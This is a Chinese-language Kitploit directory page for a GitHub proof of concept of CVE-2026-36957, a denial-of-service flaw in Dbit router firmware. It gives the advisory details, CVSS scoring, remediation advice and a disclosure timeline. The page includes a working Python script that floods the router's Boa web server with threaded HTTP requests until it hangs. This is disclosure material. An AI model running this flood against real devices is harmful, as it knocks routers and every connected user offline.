Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-36957 — CVE-2026-36957 的概念验证,这是 Dbit 路由器固件中的一个拒绝服务漏洞,通过向 Boa Web 服务器发起 HTTP 洪泛攻击,导致资源耗尽和系统挂起。 | Kitploit
工具/GitHubGitHub/kirubel-cve/cve-2026-36957
漏洞分析漏洞利用Web安全渗透测试
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

CVE-2026-36957 的概念验证,这是 Dbit 路由器固件中的一个拒绝服务漏洞,通过向 Boa Web 服务器发起 HTTP 洪泛攻击,导致资源耗尽和系统挂起。

查看仓库
125个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-36957:Boa Web 服务器因 HTTP 洪泛攻击导致拒绝服务

CVE ID: CVE-2026-36957 日期: 2026-04-29 发现者: Kirubel Solomne 厂商: 深圳市迪比特网络设备有限公司 产品: Dbit 路由器 固件版本: V1.0.0 CWE: CWE-400 - 未受控的资源消耗


描述

Dbit 路由器固件 V1.0.0 存在通过 Boa Web 服务器 URI 处理器导致的拒绝服务漏洞。攻击者向不存在的 URI 发送大量 HTTP GET 请求洪泛,可耗尽关键系统资源(包括文件描述符和内存缓冲区)。这会导致内核死锁或系统挂起,从而禁用 Web 管理门户及所有路由功能。


CVSS 评分

CVSS v3.1 评分:7.5(高危) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

指标值
攻击向量网络
攻击复杂度低
所需权限无
用户交互无
机密性影响无
完整性影响无
可用性影响高

概念验证

import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

预期行为: 服务器应限制连接并保持稳定。 实际行为: 路由器 Web 界面无响应;需要手动重启。


影响

  • Web 管理界面完全不可用
  • 所有路由功能中断
  • 需要手动重启才能恢复服务
  • 所有连接设备网络中断

修复建议

  • 在 Boa Web 服务器上实施连接速率限制
  • 添加看门狗定时器以从死锁状态恢复
  • 限制每个 IP 的最大并发连接数

披露时间线

日期事件
2026-04-29发现漏洞
2026-04-29上报至 MITRE
2026-04-29分配 CVE-2026-36957
2026-04-29公开披露

参考

  • MITRE CVE-2026-36957
  • CWE-400
  • 厂商网站
下载工具